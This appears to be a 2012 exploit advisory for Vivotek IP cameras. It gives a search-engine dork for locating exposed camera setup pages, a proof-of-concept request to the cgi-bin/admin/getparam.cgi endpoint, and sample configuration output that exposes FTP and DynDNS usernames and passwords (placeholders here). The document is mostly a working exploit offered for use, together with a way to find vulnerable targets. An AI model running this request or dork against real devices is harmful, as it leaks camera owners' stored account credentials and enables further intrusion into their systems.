Vivotek Cameras Data Configuration Disclosure

`# Exploit Title: Vivotek Full Data Source CONFIG  
# Date: 09/07/12  
# Author: Alejandro Leon Morales [GothicX]  
# Author Mail: Gothicx[at]freaknetwork[dot]in  
# Author Web: www.undermx.blogspot.mx  
# Sofware web: www.vivotek.com  
# Vulnerable version: all  
# Tested on: Microsoft windows 7 / Vista / XP/ MacOS  
# Dork: "/setup/config.html" ||allinurl:"setup/parafile.html"  
  
  
[PoC]  
  
http://server/cgi-bin/admin/getparam.cgi  
  
  
[INFO SENSIBLE]  
  
ACCOUNT FTP  
ACCOUNT DYNDNS  
  
[Result]  
  
ddns_enable='1'  
ddns_provider='DyndnsDynamic'  
ddns_Safe100_hostname=''  
ddns_Safe100_usernameemail=''  
ddns_Safe100_passwordkey=''  
ddns_DyndnsDynamic_hostname='hostname'  
ddns_DyndnsDynamic_usernameemail='usernameemail'  
ddns_DyndnsDynamic_passwordkey='passwordkey'  
ddns_DyndnsCustom_hostname=''  
ddns_DyndnsCustom_usernameemail=''  
ddns_DyndnsCustom_passwordkey=''  
ddns_TZO_hostname=''  
ddns_TZO_usernameemail=''  
ddns_TZO_passwordkey=''  
ddns_DHS_hostname=''  
ddns_DHS_usernameemail=''  
ddns_DHS_passwordkey=''  
ddns_DynInterfree_hostname=''  
ddns_DynInterfree_usernameemail=''  
ddns_DynInterfree_passwordkey=''  
ddns_CustomSafe100_hostname=''  
ddns_CustomSafe100_usernameemail=''  
ddns_CustomSafe100_passwordkey=''  
ddns_CustomSafe100_servername=''  
server_i0_type='ftp'  
server_i0_http_url='http://'  
server_i0_http_username=''  
server_i0_http_passwd=''  
server_i0_ftp_address='FTPADDRESS'  
server_i0_ftp_username='FTPUSERNAME'  
server_i0_ftp_passwd='FTPPASSWD'  
server_i0_ftp_port='21'  
server_i0_ftp_passive='1'  
server_i0_ftp_location='\\temp\\record'  
----------------------------------------------------------------------------------------------------  
  
  
[Sensitive data]  
  
FTP ACCOUNTS: server_i0_ftp_address='FTPADDRESS'  
server_i0_ftp_username='FTPUSERNAME'  
server_i0_ftp_passwd='FTPPASSWD'  
  
DYNDNS ACCOUNTS: ddns_DyndnsDynamic_hostname='hostname'  
ddns_DyndnsDynamic_usernameemail='usernameemail'  
ddns_DyndnsDynamic_passwordkey='passwordkey'  
  
  
  
  
//*************************************************************************************//  
Special Greetz: Maztor, Zeus, Klanx, Makuaz, Alverid, zer0 z0org   
  
`